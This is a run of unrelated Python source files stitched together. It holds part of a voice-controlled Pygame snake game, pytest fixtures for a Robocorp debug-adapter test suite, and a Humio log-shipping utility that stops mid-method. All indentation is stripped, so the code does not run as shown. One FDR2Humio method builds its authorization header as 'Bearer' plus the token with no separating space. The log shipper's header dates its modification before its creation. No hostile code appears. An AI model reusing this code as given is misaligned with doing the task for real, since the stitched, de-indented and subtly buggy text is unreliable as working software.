self.y[2] = 0
self._direction = 0
self._snake_head_image = self._snake_head_right
self._snake_head_image_width = self._snake_head_image.get_rect().width
self._snake_head_image_height = self._snake_head_image.get_rect().height
self._snake_tail_image = self._snake_tail_right
self.update()
def update(self):
self._update_count = self._update_count + 1
if self._need_immediate_pos_update or self._update_count > self._update_count_max:
self.update_position_immediately()
self._update_count = 0
self._need_immediate_pos_update = False
def update_position_immediately(self):
# update previous positions
for i in range(self.length - 1, 0, -1):
self.x[i] = self.x[i - 1]
self.y[i] = self.y[i - 1]
# update position of head of snake
if self._direction == 0:
self.x[0] = self.x[0] + self.step
if self.x[0] > self._display_width:
self.x[0] = self.x[0] - self._display_width - self.step
if self._direction == 1:
self.x[0] = self.x[0] - self.step
if self.x[0] < 0:
self.x[0] += self._display_width
if self._direction == 2:
self.y[0] = self.y[0] - self.step
if self.y[0] < 0:
self.y[0] += self._display_height
if self._direction == 3:
self.y[0] = self.y[0] + self.step
if self.y[0] > self._display_height:
self.y[0] = self.y[0] - self._display_height - self.step
# update traveled distance
self.traveled_dist += self.step
def move_right(self):
if self._direction != 1 and self._direction != 0:
self._direction = 0
self._need_immediate_pos_update = True
def move_left(self):
if self._direction != 0 and self._direction != 1:
self._direction = 1
self._need_immediate_pos_update = True
def move_up(self):
if self._direction != 3 and self._direction != 2:
self._direction = 2
self._need_immediate_pos_update = True
def move_down(self):
if self._direction != 2 and self._direction != 3:
self._direction = 3
self._need_immediate_pos_update = True
def grow(self):
self.length += 1
def draw(self, surface):
length = self.length
for i in range(length - 1, -1, -1):
if i == 0:
if self._direction == 0 or self._direction == 1:
x = self.x[i]
y = self.y[i] - round(self._snake_head_image_height / 2 -
self.block_size / 2)
if self._direction == 0 and (x > self.x[i + 1] or (self.x[i + 1] - x) > self._display_width / 2):
surface.blit(self._snake_head_right, (x, y))
elif self._direction == 1 and (x < self.x[i + 1] or (x - self.x[i + 1]) > self._display_width / 2):
surface.blit(self._snake_head_left, (x, y))
else:
x = self.x[i] - round(self._snake_head_image_height / 2 -
self.block_size / 2)
y = self.y[i]
if self._direction == 2 and (y < self.y[i + 1] or (y - self.y[i + 1]) > self._display_height / 2):
surface.blit(self._snake_head_up, (x, y))
elif self._direction == 3 and (y > self.y[i + 1] or (self.y[i + 1] - y) > self._display_height / 2):
surface.blit(self._snake_head_down, (x, y))
elif i == length - 1:
x = self.x[i]
y = self.y[i]
if x < self.x[i - 1]:
surface.blit(self._snake_tail_right, (x, y))
elif x > self.x[i - 1]:
surface.blit(self._snake_tail_left, (x, y))
elif y < self.y[i - 1]:
surface.blit(self._snake_tail_down, (x, y))
elif y > self.y[i - 1]:
surface.blit(self._snake_tail_up, (x, y))
else:
pygame.draw.rect(
surface, self.color,
(self.x[i], self.y[i], self.block_size, self.block_size), 0)
def is_collision(self, block_index):
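# True when the head position (index 0) falls within the body block at block_index.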
if self.x[0] >= self.x[block_index] and self.x[
0] < self.x[block_index] + self.block_size:
if self.y[0] >= self.y[block_index] and self.y[
0] < self.y[block_index] + self.block_size:
return True
return False
class Game:
player = None
apple = None
_display_width = -1
_display_height = -1
_gamestarted = False
_gameover = False
best_scores = [0] * NUMBER_OF_SCORES_TO_KEEP
score = 0
_coef = 1
_snake_to_apple_dist = -1
_gameover_text = ''
def __init__(self, display_width, display_height):
self._display_width = display_width
self._display_height = display_height
self.player = Player(3, display_width, display_height)
self.apple = Apple(display_width, display_height)
self._update_player_to_apple_dist()
self._gameover_text = 'Say \'launch game\' to start the game!\n'
self._gameover_text += '\nControls: You can say any of\n\n'
for d in ["up", "down", "left", "right"]:
self._gameover_text += '\'move %s\', \'go %s\' ' % (d, d)
self._gameover_text += 'or \'turn %s\'\n' % (d)
self._gameover_text += '\n\n to control your snake.'
def _update_gameover_text(self):
self._gameover_text = ''
if self.score > self.best_scores[0]:
self._gameover_text = 'You\'ve beaten the best score with {} points!!!'.format(
self.score)
self.best_scores.insert(0, self.score)
self.best_scores = self.best_scores[0:NUMBER_OF_SCORES_TO_KEEP]
elif self.score > self.best_scores[len(self.best_scores) - 1]:
rank = NUMBER_OF_SCORES_TO_KEEP
for rank, best_score in enumerate(self.best_scores):
if self.score > best_score:
break
self.best_scores.insert(rank, self.score)
self.best_scores = self.best_scores[0:NUMBER_OF_SCORES_TO_KEEP]
self._gameover_text = ('You\'ve entered the hall of fame with {} points '
'at rank {}!').format(self.score, rank + 1)
else:
self._gameover_text = 'You lose! Your score: {} points.'.format(
self.score)
self._gameover_text += '\n' + self._best_scores_to_text()
self._gameover_text += '\n\nSay \'launch game\' to start over!'
def start(self):
self._gameover = False
self._gamestarted = True
def started(self):
return self._gamestarted and not self._gameover
def gameover(self):
self._gameover = True
self._gamestarted = False
self._update_gameover_text()
self.score = 0
self._coef = 1
self.player.restart(length=3)
def render_gameover_text(self, surface):
font = pygame.font.Font('freesansbold.ttf', 20)
rects = []
rendered_texts = []
for i, part in enumerate(self._gameover_text.split('\n')):
rendered_texts.append(font.render(part, True, GAMEOVER_TEXT_COLOR))
rects.append(rendered_texts[i].get_rect())
total_height = 0
for rect in rects:
total_height += rect.height
starting_y = self._display_height / 2 - total_height / 2
for i, rect in enumerate(rects):
rect.center = (self._display_width / 2, starting_y)
starting_y += rect.height
surface.blit(rendered_texts[i], rect)
def is_collision_rect_to_rect(self, x1, y1, size1, x2, y2, size2):
if x1 + size1 > x2 and x1 < x2 + size2 and y1 + size1 > y2 and y1 < y2 + size2:
return True
return False
def _update_player_to_apple_dist(self):
self._snake_to_apple_dist = abs(self.player.x[0] -
self.apple.x) + abs(self.player.y[0] -
self.apple.y)
def _update_score(self):
# additional points if the distance traveled is optimized
dist_coef = self._snake_to_apple_dist / self.player.traveled_dist
# linear increase of points w.r.t the snake's length
length_coef = self.player.length * 0.33
self.score += round(length_coef) + round(dist_coef)
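# For instance, a snake of length 6 that travelled exactly the snake-to-apple distance
# gains round(6 * 0.33) + round(1.0) = 2 + 1 = 3 points.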
def _best_scores_to_text(self):
text = ''
rank = ''
for idx, score in enumerate(self.best_scores):
if score == 0:
break
if idx == 0:
rank = '1st'
elif idx == 1:
rank = '2nd'
elif idx == 2:
rank = '3rd'
else:
rank = '{}th'.format(idx + 1)
text += '{}: {} points\n'.format(rank, score)
return text
def eat_apple(self):
# play sound
# pygame.mixer.music.load('audio/eat.mp3')
# pygame.mixer.music.play(0)
# snake ate apple, update the score
self._update_score()
# reset player
self.player.traveled_dist = 0
self.apple.respan()
self._update_player_to_apple_dist()
self.player.grow()
self.player.update_position_immediately()
def update(self):
self.player.update()
# does snake eat apple?
for i in range(0, self.player.length):
if self.is_collision_rect_to_rect(self.apple.x, self.apple.y,
self.apple.size, self.player.x[i],
self.player.y[i],
self.player.block_size):
self.eat_apple()
# does snake collide with itself?
for i in range(2, self.player.length):
if self.player.is_collision(i):
self.gameover()
def draw(self, surface):
self.player.draw(surface)
self.apple.draw(surface)
if self._gameover or not self._gamestarted:
self.render_gameover_text(surface)
class Controler(object):
def __init__(self, q):
self._q = q
def callback(self, command):
self._q.put(command)
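# The keyword-spotter thread (App.spotter below) calls callback() for every detected
# voice command; App.on_execute drains the same queue to drive the game loop.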
class App:
window_width = 800
window_height = 600
def __init__(self):
self._running = True
self._display_text = None
self._display_text_rect = None
self._display_score = None
self._display_score_rect = None
self._display_surf = None
self._metadata_file = 'hearing_snake_metadata.json'
self._metadata_data = None
self._bg_image = None
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(
(self.window_width, self.window_height), pygame.HWSURFACE)
pygame.display.set_caption('The Hearing Snake')
self.game = Game(self.window_width, self.window_height)
img = pygame.image.load('pygame_images/bg.jpg')
img = pygame.transform.scale(img, (self.window_width, self.window_height))
self._bg_image = img.convert()
self.on_load_metadata()
self._running = True
return True
def on_load_metadata(self):
script_dir = os.path.dirname(os.path.realpath(__file__))
metadata_file_path = os.path.join(script_dir, self._metadata_file)
if not os.path.isfile(metadata_file_path):
self._metadata_data = {}
self._metadata_data['version'] = 1.0
with open(metadata_file_path, 'w') as outfile:
json.dump(self._metadata_data, outfile, indent=4)
else:
with open(metadata_file_path) as json_file:
self._metadata_data = json.load(json_file)
if 'best_scores' in self._metadata_data:
self.game.best_scores = self._metadata_data['best_scores']
else:
self.game.best_scores = [0] * NUMBER_OF_SCORES_TO_KEEP  # no saved scores yet; keep the zero-filled defaults
self.game.best_scores.sort(
reverse=True) # descending order, best score first
def on_save_metadata(self):
script_dir = os.path.dirname(os.path.realpath(__file__))
metadata_file_path = os.path.join(script_dir, self._metadata_file)
self._metadata_data['best_scores'] = self.game.best_scores
with open(metadata_file_path, 'w') as outfile:
json.dump(self._metadata_data, outfile, indent=4)
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
def on_loop(self):
self.game.update()
def on_display_score(self, color):
font = pygame.font.Font('freesansbold.ttf', 20)
self._display_score = font.render('Score: {}'.format(self.game.score), True,
color, None)
self._display_score_rect = self._display_score.get_rect()
self._display_score_rect = (self.window_width -
self._display_score_rect.width - 10, 10)
self._display_surf.blit(self._display_score, self._display_score_rect)
def on_render(self):
self._display_surf.blit(self._bg_image, [0, 0])
self.game.draw(self._display_surf)
self.on_display_score(SCORE_TEXT_COLOR)
pygame.display.flip()
def on_cleanup(self):
self.on_save_metadata()
pygame.quit()
def spotter(self, args):
interpreter = model.make_interpreter(args.model_file)
interpreter.allocate_tensors()
mic = args.mic if args.mic is None else int(args.mic)
model.classify_audio(mic, interpreter,
labels_file="config/labels_gc2.raw.txt",
commands_file="config/commands_v2_snake.txt",
dectection_callback=self._controler.callback,
sample_rate_hz=int(args.sample_rate_hz),
num_frames_hop=int(args.num_frames_hop))
def on_execute(self, args):
if not self.on_init():
self._running = False
q = model.get_queue()
self._controler = Controler(q)
if not args.debug_keyboard:
t = Thread(target=self.spotter, args=(args,))
t.daemon = True
t.start()
item = -1
while self._running:
pygame.event.pump()
if args.debug_keyboard:
keys = pygame.key.get_pressed()
else:
try:
new_item = q.get(True, 0.1)
except queue.Empty:
new_item = None
if new_item is not None:
item = new_item
if (args.debug_keyboard and keys[pygame.K_ESCAPE]) or item == "stop":
self._running = False
if (args.debug_keyboard and keys[pygame.K_SPACE]) or item == "go":
self.game.start()
if self.game.started():
if (args.debug_keyboard and keys[pygame.K_RIGHT]) or item == "right":
self.game.player.move_right()
if (args.debug_keyboard and keys[pygame.K_LEFT]) or item == "left":
self.game.player.move_left()
if (args.debug_keyboard and keys[pygame.K_UP]) or item == "up":
self.game.player.move_up()
if (args.debug_keyboard and keys[pygame.K_DOWN]) or item == "down":
self.game.player.move_down()
self.on_loop()
self.on_render()
time.sleep(0.05)
self.on_cleanup()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--debug_keyboard',
help='Use the keyboard to control the game.',
action='store_true',
default=False)
model.add_model_flags(parser)
args = parser.parse_args()
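# Illustrative run with keyboard controls only (no microphone model needed):
#   python3 run_hearing_snake.py --debug_keyboard
# Without --debug_keyboard, the flags registered by model.add_model_flags (model file,
# microphone, sample rate, hop size; consumed in App.spotter) pick the voice model.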
the_app = App()
the_app.on_execute(args)
|
fixtures.py
|
# coding: utf-8
# Original work Copyright Fabio Zadrozny (EPL 1.0)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
from robocorp_ls_core.subprocess_wrapper import subprocess
import queue
import threading
import pytest # type: ignore
import sys
import os
from typing import Optional, Iterable
from robocorp_ls_core.options import DEFAULT_TIMEOUT
__file__ = os.path.abspath(__file__)
if __file__.endswith((".pyc", ".pyo")):
__file__ = __file__[:-1]
@pytest.fixture
def dap_logs_dir(tmpdir):
import locale
logs_directory = tmpdir.join("logs_adapter")
logs_directory.mkdir()
yield logs_directory
for name in os.listdir(str(logs_directory)):
sys.stderr.write("\n--- %s contents:\n" % (name,))
if name in ("output.xml", "report.html", "log.html"):
sys.stderr.write("--- Not printed --- \n\n")
continue
with open(str(logs_directory.join(name)), "rb") as stream:
contents = stream.read().decode(locale.getpreferredencoding(), "replace")
sys.stderr.write(contents)
sys.stderr.write("\n\n")
@pytest.fixture
def dap_log_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robocorp_code_dap_tests.log"))
sys.stderr.write("Logging subprocess to: %s\n" % (filename,))
yield filename
@pytest.fixture
def dap_process_stderr_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robocorp_code_dap_tests_stderr.log"))
sys.stderr.write("Output subprocess stderr to: %s\n" % (filename,))
with open(filename, "wb") as stream:
yield stream
@pytest.fixture
def dap_process(dap_log_file, dap_process_stderr_file):
from robocorp_code_debug_adapter import __main__
from robocorp_ls_core.basic import kill_process_and_subprocesses
env = os.environ.copy()
env["ROBOCORP_CODE_DAP_LOG_LEVEL"] = "3"
env["ROBOCORP_CODE_DAP_LOG_FILENAME"] = dap_log_file
dap_process = subprocess.Popen(
[sys.executable, "-u", __main__.__file__],
stdout=subprocess.PIPE,
stderr=dap_process_stderr_file,
stdin=subprocess.PIPE,
env=env,
)
assert dap_process.returncode is None
yield dap_process
if dap_process.returncode is None:
kill_process_and_subprocesses(dap_process.pid)
class _DebuggerAPI(object):
def __init__(
self,
reader=None,
writer=None,
write_queue=None,
read_queue=None,
dap_resources_dir=None,
):
self.reader = reader
self.writer = writer
self.write_queue = write_queue
self.read_queue = read_queue
self.all_messages_read = []
self.target = None
self.dap_resources_dir = dap_resources_dir
def write(self, msg):
"""
:param BaseSchema msg:
The message to be written.
"""
self.write_queue.put(msg)
return msg
def read(self, expect_class=None, accept_msg=None, timeout=TIMEOUT):
"""
Waits for a message and returns it (may throw error if there's a timeout waiting for the message).
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEvent
while True:
msg = self.read_queue.get(timeout=timeout)
if hasattr(msg, "to_dict"):
sys.stderr.write("Read: %s\n\n" % (msg.to_dict(),))
else:
sys.stderr.write("Read: %s\n\n" % (msg,))
self.all_messages_read.append(msg)
if expect_class is not None or accept_msg is not None:
if self._matches(msg, expect_class, accept_msg):
return msg
# Only skip OutputEvent. Other events must match.
if not isinstance(msg, OutputEvent):
raise AssertionError(
"Received: %s when expecting: %s" % (msg, expect_class)
)
else:
# expect_class and accept_msg are None
return msg
def assert_message_found(self, expect_class=None, accept_msg=None):
for msg in self.all_messages_read:
if self._matches(msg, expect_class, accept_msg):
return True
raise AssertionError("Did not find expected message.")
def _matches(self, msg, expect_class=None, accept_msg=None):
if (expect_class is None or isinstance(msg, expect_class)) and (
accept_msg is None or accept_msg(msg)
):
return True
return False
def get_dap_case_file(self, filename, must_exist=True):
import os.path
ret = os.path.join(self.dap_resources_dir, filename)
if must_exist:
assert os.path.exists(ret), "%s does not exist." % (ret,)
return ret
def initialize(self, rcc_config_location):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializeRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeResponse,
)
self.write(
InitializeRequest(
InitializeRequestArguments(
adapterID="robocorp-code-adapter",
clientID="Stub",
clientName="stub",
locale="en-us",
linesStartAt1=True,
columnsStartAt1=True,
pathFormat="path",
supportsVariableType=True,
supportsVariablePaging=True,
supportsRunInTerminalRequest=True,
rccConfigLocation=rcc_config_location,
)
)
)
initialize_response = self.read(InitializeResponse)
assert isinstance(initialize_response, InitializeResponse)
assert initialize_response.request_seq == 0
assert initialize_response.success
assert initialize_response.command == "initialize"
def configuration_done(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneResponse,
)
self.write(ConfigurationDoneRequest())
self.read(ConfigurationDoneResponse)
def launch(
self,
robot,
task,
debug=False,
success=True,
terminal="none",
args: Optional[Iterable[str]] = None,
environ: Optional[dict] = None,
):
"""
:param args:
The arguments to the launch (for instance:
["--variable", "my_var:22"]
)
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
LaunchRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchResponse
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializedEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
launch_args = LaunchRequestArguments(
__sessionId="some_id",
noDebug=not debug,
robot=robot,
task=task,
terminal=terminal,
)
if args:
launch_args.kwargs["args"] = args
if environ:
launch_args.kwargs["env"] = environ
self.write(LaunchRequest(launch_args))
if success:
# Initialized is sent just before the launch response (at which
# point it's possible to send breakpoints).
event = self.read(InitializedEvent, timeout=10 * 60)
assert isinstance(event, InitializedEvent)
if success:
launch_response = self.read(LaunchResponse)
else:
launch_response = self.read(Response)
assert launch_response.success == success
def list_threads(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ThreadsRequest
return self.wait_for_response(self.write(ThreadsRequest()))
def set_breakpoints(self, target, lines):
import os.path
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Source
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import SourceBreakpoint
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsResponse,
)
if isinstance(lines, int):
lines = (lines,)
assert isinstance(lines, (list, tuple))
self.write(
SetBreakpointsRequest(
SetBreakpointsArguments(
source=Source(name=os.path.basename(target), path=target),
lines=lines,
breakpoints=[
SourceBreakpoint(line=line).to_dict() for line in lines
],
)
)
)
response = self.read(SetBreakpointsResponse)
assert len(response.body.breakpoints) == len(lines)
def wait_for_response(self, request, response_class=None):
from robocorp_ls_core.debug_adapter_core.dap.dap_base_schema import (
get_response_class,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
if response_class is None:
response_class = get_response_class(request)
def accept_message(response):
if isinstance(request, dict):
if response.request_seq == request["seq"]:
return True
else:
if response.request_seq == request.seq:
return True
return False
return self.read((response_class, Response), accept_message)
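# Sketch of how these helpers are typically combined in a test; the robot path, task
# name and rcc config location below are placeholders, not real project values:
#
#   def test_launch(debugger_api):
#       target = debugger_api.get_dap_case_file("some_robot/robot.yaml")
#       debugger_api.initialize(rcc_config_location="<path-to-rcc-config>")
#       debugger_api.launch(target, "Default task", debug=False)
#       debugger_api.configuration_done()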
@pytest.fixture(scope="session")
def dap_resources_dir(tmpdir_factory):
from robocorp_ls_core.copytree import copytree_dst_exists
basename = u"dap áéíóú"
copy_to = str(tmpdir_factory.mktemp(basename))
f = __file__
original_resources_dir = os.path.join(os.path.dirname(f), u"_dap_resources")
assert os.path.exists(original_resources_dir)
copytree_dst_exists(original_resources_dir, copy_to)
resources_dir = copy_to
assert os.path.exists(resources_dir)
return resources_dir
@pytest.fixture
def debugger_api_core(dap_resources_dir):
return _DebuggerAPI(dap_resources_dir=dap_resources_dir)
@pytest.fixture
def debugger_api(dap_process, dap_resources_dir):
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import writer_thread
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import reader_thread
write_to = dap_process.stdin
read_from = dap_process.stdout
write_queue = queue.Queue()
read_queue = queue.Queue()
writer = threading.Thread(
target=writer_thread, args=(write_to, write_queue), name="Debugger API writer"
)
writer.daemon = True
reader = threading.Thread(
target=reader_thread,
args=(read_from, read_queue.put, read_queue),
name="Debugger API reader",
)
reader.daemon = True
reader.start()
writer.start()
return _DebuggerAPI(
reader=reader,
writer=writer,
write_queue=write_queue,
read_queue=read_queue,
dap_resources_dir=dap_resources_dir,
)
def dbg_wait_for(condition, msg=None, timeout=DEFAULT_TIMEOUT, sleep=1 / 20.0):
from robocorp_ls_core.basic import wait_for_condition
if "pydevd" in sys.modules:
timeout = sys.maxsize
wait_for_condition(condition, msg, timeout, sleep)
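# A minimal usage sketch for the helpers above (assumptions: "target.robot" is
# a hypothetical file inside `dap_resources_dir`, and breakpoints are only
# accepted after the launch helper has read InitializedEvent, as noted there;
# this is illustrative and not an actual test from the suite).
def _example_breakpoint_flow(debugger_api, dap_resources_dir):
    import os.path
    target = os.path.join(dap_resources_dir, "target.robot")  # hypothetical file name
    # set_breakpoints() accepts a single line or a list/tuple of lines and
    # asserts that the adapter acknowledged every breakpoint.
    debugger_api.set_breakpoints(target, 5)
    # list_threads() wraps a ThreadsRequest and waits for the matching response.
    threads_response = debugger_api.list_threads()
    assert threads_response is not None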
|
logshipper.py
|
"""Humio Log Shipping utility.
___ ___ __
| Y .--.--.--------|__.-----.
|. 1 | | | | | _ |
|. _ |_____|__|__|__|__|_____|
|: | |
|::.|:. | Log Connector
`--- ---'
Creation date: 10.12.2022 - ckachigian@CrowdStrike, nkhetia31@CrowdStrike, kylesmartin@CrowdStrike
Modified: 01.20.2022 - nkhetia31@CrowdStrike, jshcodes@CrowdStrike, redhatrises@CrowdStrike
"""
import configparser
import json
import gzip
from io import BytesIO
import sys
import os
import logging
from logging.handlers import RotatingFileHandler
import threading
from pathlib import Path
import time
import glob
import hashlib
import socket
import signal
import mmap
import urllib3
import boto3
from google.cloud import pubsub_v1
# Configure logging.
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
log_handle = RotatingFileHandler('logshipper.log', maxBytes=2048000, backupCount=5)
log_handle.setLevel(logging.DEBUG)
log_handle.setFormatter(formatter)
logger.addHandler(log_handle)
hostname = socket.getfqdn()
# TODO: add OS identification, hostname, and IP address automatically.
class FDR2Humio(threading.Thread): # pylint: disable=R0902
"""FDR2Humio class."""
def __init__(self, # pylint: disable=R0913
a_key,
s_key,
sqs_q,
rgn,
dest_url,
dest_token,
name="crwd-fdr",
):
"""Initialize the object."""
threading.Thread.__init__(self)
self.name = name
self.a_key = a_key
self.s_key = s_key
self.sqs_q = sqs_q
self.rgn = rgn
self.dest_url = dest_url
self.dest_token = dest_token
self.sqs_client = boto3.client('sqs',
region_name=self.rgn,
aws_access_key_id=self.a_key,
aws_secret_access_key=self.s_key
)
self.s3_client = boto3.client("s3",
region_name=self.rgn,
aws_access_key_id=self.a_key,
aws_secret_access_key=self.s_key
)
self.http = urllib3.PoolManager()
self.killed = False
def run(self):
"""Start the thread."""
logger.debug('Starting %s', self.name)
while not self.killed:
sub_threads = []
for _ in range(20): # Might want to make thread count an adjustable variable
try:
bucket1, key1, handle1 = self.get_location()
if bucket1 and key1:
subthread = threading.Thread(target=self.read_events, args=[bucket1, key1, handle1])
sub_threads.append(subthread)
subthread.start()
except Exception as erred:
logger.debug(erred)
break
time.sleep(5)
for sub_thread in sub_threads:
sub_thread.join()
logger.debug("Stopping %s", self.name)
def read_events(self, bucket2, key2, handle2):
"""Event reader sub-processing thread handler."""
self.ingest_event(json.loads(self.get_content(bucket2, key2)))
logger.debug("file: %s", str(key2))
self.delete_message(handle2)
def get_location(self):
"""Retrieve the S3 location from the SQS message."""
response = self.sqs_client.receive_message(QueueUrl=self.sqs_q, WaitTimeSeconds=10,
VisibilityTimeout=300, MaxNumberOfMessages=1)
message = response['Messages'][0]
mbody = json.loads(message['Body'])
return mbody['bucket'], mbody['files'][0]['path'], message['ReceiptHandle']
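    # Illustrative shape of the SQS notification consumed by get_location()
    # above (values are placeholders; only the keys actually read are shown):
    #
    #   message["ReceiptHandle"]  -> opaque handle later passed to delete_message()
    #   json.loads(message["Body"]) ->
    #       {"bucket": "<fdr-bucket-name>",
    #        "files": [{"path": "<key-prefix>/part-00000.gz"}]}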
def get_content(self, bucket1, key1):
"""Read in the gzip'd message."""
response = self.s3_client.get_object(Bucket=bucket1, Key=key1)
with gzip.GzipFile(fileobj=response["Body"]) as gzipfile:
json_file = json.dumps(gzipfile.read().decode('utf-8'))
return json_file
def delete_message(self, handle1):
"""Delete the message from the SQS queue."""
return self.sqs_client.delete_message(QueueUrl=self.sqs_q, ReceiptHandle=handle1)
def ingest_event(self, record1):
"""Ingest the parsed event."""
return self.http.request("POST",
self.dest_url,
body=record1.encode('utf-8'),
headers={"Content-Type": "application/json", "Authorization": "Bearer"
+ self.dest_token})
def kill(self):
"""Set the kill flag."""
self.killed = True
class CloudTrail(threading.Thread):
"""AWS CloudTrail class."""
def __init__(self,
a_key,
s_key,
sqs_q,
rgn,
dest_url,
dest_token,
name="aws-cloudtrail",
):
"""Initialize the CloudTrail object."""
threading.Thread.__init__(self)
self.name = name
self.a_key = a_key
self.s_key = s_key
self.sqs_q = sqs_q
self.rgn = rgn
self.dest_url = dest_url
self.dest_token = dest_token
self.sqs_client = boto3.client('sqs',
region_name=self.rgn,
aws_access_key_id=self.a_key,
aws_secret_access_key=self.s_key
)
self.s3_client = boto3.client("s3",
region_name=self.rgn,
aws_access_key_id=self.a_key,
aws_secret_access_key=self.s_key
)
self.http = urllib3.PoolManager()
self.killed = False
def run(self):
"""Start the thread."""
logger.debug('Starting %s', self.name)
while not self.killed:
sub_threads = []
for _ in range(50): # Might want to make thread count an adjustable variable
try:
bucket1, key1, handle1 = self.get_location()
subthread = threading.Thread(target=self.read_events, args=[bucket1, key1, handle1])
sub_threads.append(subthread)
subthread.start()
except Exception as erred:
logger.debug(erred)
break
time.sleep(5)
for sub_thread in sub_threads:
sub_thread.join()
logger.debug("Stopping %s", self.name)
def read_events(self, bucket2, key2, handle2):
"""Event reader sub-processing thread handler."""
reccount = 0
for record in self.get_content(bucket2, key2):
_ = self.ingest_event(json.dumps(record))
reccount = reccount + 1
logger.debug("file: %s events: %s", str(key2), str(reccount))
self.delete_message(handle2)
def get_location(self):
"""Retrieve the S3 location from the SQS message."""
response = self.sqs_client.receive_message(QueueUrl=self.sqs_q, MessageAttributeNames=["All"],
WaitTimeSeconds=10, VisibilityTimeout=300, MaxNumberOfMessages=1)
message = json.loads(response["Messages"][0]["Body"])
name = message["Records"][0]["s3"]["bucket"]["name"]
key = message["Records"][0]["s3"]["object"]["key"]
receipt_handle = response["Messages"][0]["ReceiptHandle"]
return name, key, receipt_handle
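    # Illustrative shape of the S3 event notification parsed above (values
    # are placeholders; only the keys actually read are shown):
    #
    #   json.loads(response["Messages"][0]["Body"]) ->
    #       {"Records": [{"s3": {"bucket": {"name": "<trail-bucket-name>"},
    #                            "object": {"key": "AWSLogs/<account>/CloudTrail/<file>.json.gz"}}}]}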
def get_content(self, bucket1, key1):
"""Read in the gzip'd message."""
response = self.s3_client.get_object(Bucket=bucket1, Key=key1)
json_file = json.load(gzip.GzipFile(None, 'rb', None, BytesIO(response['Body'].read())))
return json_file["Records"]
def delete_message(self, handle1):
"""Delete the message from the SQS queue."""
return self.sqs_client.delete_message(QueueUrl=self.sqs_q, ReceiptHandle=handle1)
def ingest_event(self, record1):
"""Ingest the parsed event."""
return self.http.request("POST",
self.dest_url,
body=record1,
headers={"Content-Type": "application/json", "Authorization": f"Bearer {self.dest_token}"}
)
def kill(self):
"""Set the kill flag."""
self.killed = True
class SIEMConnector(threading.Thread):
"""SIEM connector class."""
def __init__(self, source_loc, dest_url, dest_token, name="siem-connector"):
"""Initialize the SIEM connector object."""
threading.Thread.__init__(self)
self.name = name
self.source_loc = source_loc
self.dest_url = dest_url
self.dest_token = dest_token
self.http = urllib3.PoolManager()
self.killed = False
def run(self):
"""Run the connector."""
count = 0
logger.debug('Starting %s', self.name)
if Path(self.source_loc).is_file():
logger.debug('filename: %s', self.source_loc)
newevent = ''
with open(self.source_loc, encoding="utf-8") as source_file:
for line in self.read_streaming_file(source_file):
newevent = newevent + line.rstrip()
if line.rstrip() == '}':
count = count + 1
read_event = json.loads(newevent)
logger.debug('Count = %s', str(count))
self.ingest_event(json.dumps(read_event)+'\n')
newevent = ''
logger.debug('Stopping %s', self.name)
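    # The loop in run() above accumulates lines until it sees a line that is
    # exactly "}", so the source file is expected to contain pretty-printed
    # JSON events whose closing brace sits alone on its own line, e.g.
    # (illustrative):
    #
    #   {
    #       "example_field": "value"
    #   }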
def read_streaming_file(self, source_loc1):
"""Read in the contents of the streamed file."""
interval = 0.2
while not self.killed:
_ = source_loc1.tell()
line = source_loc1.readline()
if not line:
logger.debug('sleeping... %s', self.name)
time.sleep(interval)
else:
yield line
def ingest_event(self, event1):
"""Ingest the parsed event."""
return self.http.request("POST",
self.dest_url,
body=event1,
headers={"Content-Type": "application/json", "Authorization": f"Bearer {self.dest_token}"}
)
def kill(self):
"""Set the kill flag."""
self.killed = True
class Syslog(threading.Thread):
"""Class to represent a SysLog connection."""
def __init__(self,
source_loc,
source_cat,
dest_type,
dest_url,
dest_token,
name="syslog"
):
"""Initialize the Syslog object."""
threading.Thread.__init__(self)
self.name = name
self.source_loc = source_loc
self.source_cat = source_cat
self.dest_type = dest_type
self.dest_url = dest_url
self.dest_token = dest_token
self.http = urllib3.PoolManager()
self.killed = False
def run(self):
"""Start the connector."""
logger.debug('Starting %s', self.name)
        if (Path(self.source_loc).is_file() and self.source_cat == 'folder') \
                or (Path(self.source_loc).is_dir() and self.source_cat == 'file'):
            logger.debug(self.source_loc + ' is not ' + self.source_cat)
else:
pos = {}
if Path(self.name).exists():
try:
with open(self.name, 'r') as pfr:
